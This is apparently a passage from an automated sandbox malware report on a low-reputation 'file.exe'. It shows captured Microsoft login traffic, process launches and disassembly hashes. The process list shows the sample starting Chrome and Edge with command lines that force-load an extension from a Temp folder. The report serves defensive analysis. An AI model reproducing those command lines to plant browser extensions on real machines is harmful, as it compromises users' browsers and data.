                                                                                                                                          2024-04-12 07:17:35 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-04-12 07:17:35 UTC569INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Fri, 12 Apr 2024 07:16:35 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C503_BL2
                                                                                                                                          x-ms-request-id: f870cd75-195c-4222-a0e0-992cbc10a8d1
                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001D781 V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Fri, 12 Apr 2024 07:17:34 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 11392
                                                                                                                                          2024-04-12 07:17:35 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          42192.168.2.54981540.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:17:37 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 4775
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:17:37 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-04-12 07:17:37 UTC569INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Fri, 12 Apr 2024 07:16:37 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C503_BL2
                                                                                                                                          x-ms-request-id: 3f5d044b-3f1b-4b5e-95be-b6f20bb8861e
                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001D9C2 V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Fri, 12 Apr 2024 07:17:37 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 11392
                                                                                                                                          2024-04-12 07:17:37 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          43192.168.2.54981640.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:17:38 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 4775
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:17:38 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-04-12 07:17:38 UTC569INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Fri, 12 Apr 2024 07:16:38 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C503_BL2
                                                                                                                                          x-ms-request-id: b7b0e2d4-e06e-4748-beee-3411d3e30119
                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001D9F8 V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Fri, 12 Apr 2024 07:17:37 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 11392
                                                                                                                                          2024-04-12 07:17:38 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Statistics

                                                                                                                                          CPU Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          Memory Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          High Level Behavior Distribution

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:09:14:32
                                                                                                                                          Start date:12/04/2024
                                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                          Imagebase:0x2017b7e0000
                                                                                                                                          File size:51'712 bytes
                                                                                                                                          MD5 hash:C111771F5D635783EC7D12A6852102EC
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:09:14:34
                                                                                                                                          Start date:12/04/2024
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:09:14:34
                                                                                                                                          Start date:12/04/2024
                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
                                                                                                                                          Imagebase:0x7ff6c1cf0000
                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:09:14:35
                                                                                                                                          Start date:12/04/2024
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=1996,i,9500446776372737509,2397503758829170713,262144 /prefetch:8
                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:09:14:36
                                                                                                                                          Start date:12/04/2024
                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2096,i,15131329549635077134,11968698142116622703,262144 /prefetch:3
                                                                                                                                          Imagebase:0x7ff6c1cf0000
                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:09:14:37
                                                                                                                                          Start date:12/04/2024
                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                          Imagebase:0x7ff6c1cf0000
                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:09:14:39
                                                                                                                                          Start date:12/04/2024
                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:3
                                                                                                                                          Imagebase:0x7ff6c1cf0000
                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:09:14:42
                                                                                                                                          Start date:12/04/2024
                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7000 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:8
                                                                                                                                          Imagebase:0x7ff6c1cf0000
                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:09:14:42
                                                                                                                                          Start date:12/04/2024
                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7036 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:8
                                                                                                                                          Imagebase:0x7ff6c1cf0000
                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:18
                                                                                                                                          Start time:09:15:39
                                                                                                                                          Start date:12/04/2024
                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7024 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:8
                                                                                                                                          Imagebase:0x7ff6c1cf0000
                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:false

                                                                                                                                          Disassembly

                                                                                                                                          Reset < >

                                                                                                                                            Executed Functions

                                                                                                                                            Function 00007FF848F1C660 Relevance: 6.2, Strings: 4, Instructions: 1211COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: VN_H$xN_^$|N_I$}N_I
                                                                                                                                            • API String ID: 0-3888832826
                                                                                                                                            • Opcode ID: 44921e5d5334e0e8243df6c85bb68b84dcdfe4db6a3cc24c5ef47defafa509bb
                                                                                                                                            • Instruction ID: 6f3ee8d4fc01efc2072c979643b70d3850b6998e41998f83b45e426a4cdd6238
                                                                                                                                            • Opcode Fuzzy Hash: 44921e5d5334e0e8243df6c85bb68b84dcdfe4db6a3cc24c5ef47defafa509bb
                                                                                                                                            • Instruction Fuzzy Hash: D0721533E0E5529EE255B76CB8551FA67A0EF817B5F084277D24DCA0C3EF1C68464398
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F10480 Relevance: .4, Instructions: 435COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 50c76b113e87d723f59f1b38cc76dd00ae44ea606485c7b4adfe7db5b1bd04a8
                                                                                                                                            • Instruction ID: 3ec9ccb1cec8c7ecab755857d94e397928cb4f10c077e501f7e81d4bb3d04c2b
                                                                                                                                            • Opcode Fuzzy Hash: 50c76b113e87d723f59f1b38cc76dd00ae44ea606485c7b4adfe7db5b1bd04a8
                                                                                                                                            • Instruction Fuzzy Hash: 3DC1E431A1CB468FE78DEF2C941967577E1EB99391F0541BAD00ACB2D3DE2CAC818794
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F14F11 Relevance: .4, Instructions: 427COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 52f2a42221862c5cbf01369a13927ce9badff9f5d305bbfe8663ff06e8192d56
                                                                                                                                            • Instruction ID: 37e9df1f9cd2f6cdab2e257baa2ef94dee2963a72e92f209b7ac5b0d473e1540
                                                                                                                                            • Opcode Fuzzy Hash: 52f2a42221862c5cbf01369a13927ce9badff9f5d305bbfe8663ff06e8192d56
                                                                                                                                            • Instruction Fuzzy Hash: B9C1D331A1DB468FE78DEB28941967577E1EF9A391F0541FAD009CB2D3DE2CAC818790
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F1C850 Relevance: 4.6, Strings: 3, Instructions: 871COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: VN_H$xN_^$|N_I
                                                                                                                                            • API String ID: 0-3828430276
                                                                                                                                            • Opcode ID: 0a80ca5b86ccc81302f0ce195c8cdae7afd047b4d09d897d96673484e4393eec
                                                                                                                                            • Instruction ID: 24b238e86aba2c206deb0b46daa6e6ff94ab0fc6f8685fcad4f8dd562f5365cd
                                                                                                                                            • Opcode Fuzzy Hash: 0a80ca5b86ccc81302f0ce195c8cdae7afd047b4d09d897d96673484e4393eec
                                                                                                                                            • Instruction Fuzzy Hash: 0542F633E0E9929FE255F76CA8511FA77A0EF817A4F0842B7D14DCB1C7EE1C68464298
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F1C950 Relevance: 4.5, Strings: 3, Instructions: 770COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: VN_H$xN_^$|N_I
                                                                                                                                            • API String ID: 0-3828430276
                                                                                                                                            • Opcode ID: f86f0f27977bed0515307481f268d3874aef51c12a62ab6bb9e331a76a73b0f3
                                                                                                                                            • Instruction ID: 72189d3909ecc7e43471f2a7666a79007ed1722053ef7f1a899557ea2f754dcd
                                                                                                                                            • Opcode Fuzzy Hash: f86f0f27977bed0515307481f268d3874aef51c12a62ab6bb9e331a76a73b0f3
                                                                                                                                            • Instruction Fuzzy Hash: 6122F433E0E9929FE255F76CA8511EA77A0EF407A4B0842B6C14DCB1C7EE1C6D464298
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F1CD78 Relevance: 1.6, Strings: 1, Instructions: 363COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
